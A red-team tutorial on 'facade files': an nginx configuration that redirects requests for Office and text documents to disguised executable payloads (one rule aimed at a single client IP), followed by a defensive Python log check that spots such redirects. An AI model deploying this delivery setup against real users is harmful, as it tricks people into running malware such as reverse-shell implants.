FACADE FILES
These are files that serve as deceptive decoys. In most enterprise environments and on employee machines, file extensions are hidden. Hiding extensions gives the attacker's payload a better chance of being triggered by the victim, because the requested resource name looks the same as the payload name.
#these extensions are chosen specifically because they are clickable, which targets careless users
#as soon as these payloads are clicked, the implants within them get triggered - e.g., a reverse shell
#this functionality is already a feature in PwnDrop
#connect to the ec2 nginx vps (ssh with the instance key; {key}.pem is a placeholder)
root@oco:~$ ssh -i {key}.pem ubuntu@ec2.compute.amazonaws.com
#configure facade files server - simply add the below configuration to the conf file
root@oco:~$ cd /etc/nginx/conf.d
root@oco:~$ nano extension_spoof.conf
...
location / {
    #serve the file or directory if it exists, otherwise answer 404 (no space between = and 404)
    try_files $uri $uri/ =404;
}
#this section serves the "sysinternals.exe" binary upon receiving a request for any ".doc" file, as long as the remote address criteria is met
#the return 302 is a redirection that states the resource has moved to a new location
#this return 302 redirect functionality is abused to deliver an alternative file!
location ~ \.doc$ {
    #anchored regex with escaped dots so only this exact address matches, not any address containing similar digits
    if ($remote_addr ~ "^74\.235\.35\.184$") {
        return 302 /sysinternals.exe;
    }
}
#this section serves the "Auto_Suite.hta" file upon receiving a request for any .docx file
location ~ \.docx$ {
    return 302 /Auto_Suite.hta;
}
#this section serves the "MS_Helper.chm" file upon receiving a request for any .xls file
location ~ \.xls$ {
    return 302 /MS_Helper.chm;
}
#this section serves the "Professional_Suite.dll" file upon receiving a request for any .xlsx file
location ~ \.xlsx$ {
    return 302 /Professional_Suite.dll;
}
#this section serves the "AD_Suite.ps1" file upon receiving a request for any .txt file
location ~ \.txt$ {
    return 302 /AD_Suite.ps1;
}
#example trigger
root@NGVM: BROWSER > {nuclear.cyberwarfare.live}
* this should work and anyone visiting will see the legitimate nginx page
root@NGVM: BROWSER > {nuclear.cyberwarfare.live/arbitraryPage}
* this will show a 404 NOT FOUND error as nothing is configured for that path
root@NGVM: BROWSER > {nuclear.cyberwarfare.live/resource.xls}
* although the file named "resource.xls" doesn't exist on the server, the
server will perform the configured redirection and the browser will download whatever
alternate resource is assigned to the .xls extension
* the traffic and requests can be viewed in dev tools via the Network tab
- e.g., a request for legit.xls is received, and the MS_Helper.chm response is sent instead, which is the malware payload
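The dev-tools view above is also what a defender can look for in proxy logs: a request for a document extension answered with a 302, followed within seconds by the same client fetching an executable from the same host. The check below is an added example, not part of the original notes or of PwnDrop; it assumes a hypothetical proxy-log layout and runs over constructed sample lines.

```python
import re
from collections import defaultdict
from datetime import datetime

# Extensions a user expects to open as documents versus ones that execute code.
DOC_EXT = {".doc", ".docx", ".xls", ".xlsx", ".txt"}
EXEC_EXT = {".exe", ".hta", ".chm", ".dll", ".ps1"}

# Hypothetical proxy-log layout: <iso timestamp> <client> <method> <host> <path> <status>
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) "
                     r"(?P<host>\S+) (?P<path>\S+) (?P<status>\d{3})$")

# Constructed sample traffic: one client follows a facade redirect, two do not.
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.1.2.3 GET files.example.test /reports/legit.xls 302
2024-05-01T10:00:02 10.1.2.3 GET files.example.test /MS_Helper.chm 200
2024-05-01T10:00:09 10.1.2.3 GET files.example.test /index.html 200
2024-05-01T10:02:00 10.1.2.4 GET files.example.test /q1/budget.xlsx 200
2024-05-01T10:03:00 10.1.2.5 GET cdn.example.test /old.doc 302
2024-05-01T10:03:01 10.1.2.5 GET cdn.example.test /new.doc 200
"""

def ext_of(path):
    """Lower-cased extension of the last path segment, query string ignored."""
    name = path.split("?", 1)[0].rsplit("/", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""

def find_facade_redirects(log_text, window_s=5):
    """Flag a document request answered with 302 when the same client then
    fetches an executable from the same host within window_s seconds.
    Returns a list of (client, host, requested_path, delivered_path)."""
    pending = defaultdict(list)   # (client, host) -> [(ts, document path)]
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                # skip lines that do not fit the layout
        ts = datetime.fromisoformat(m["ts"])
        key = (m["client"], m["host"])
        ext = ext_of(m["path"])
        if m["status"] == "302" and ext in DOC_EXT:
            pending[key].append((ts, m["path"]))
        elif m["status"] == "200" and ext in EXEC_EXT:
            for doc_ts, doc_path in pending[key]:
                if 0 <= (ts - doc_ts).total_seconds() <= window_s:
                    hits.append((m["client"], m["host"], doc_path, m["path"]))
            pending[key].clear()    # each redirect is matched at most once
    return hits
```

Running `find_facade_redirects(SAMPLE_LOG)` on the constructed lines reports only client 10.1.2.3, which asked for /reports/legit.xls and received /MS_Helper.chm; the direct .xlsx download and the .doc-to-.doc redirect are left alone.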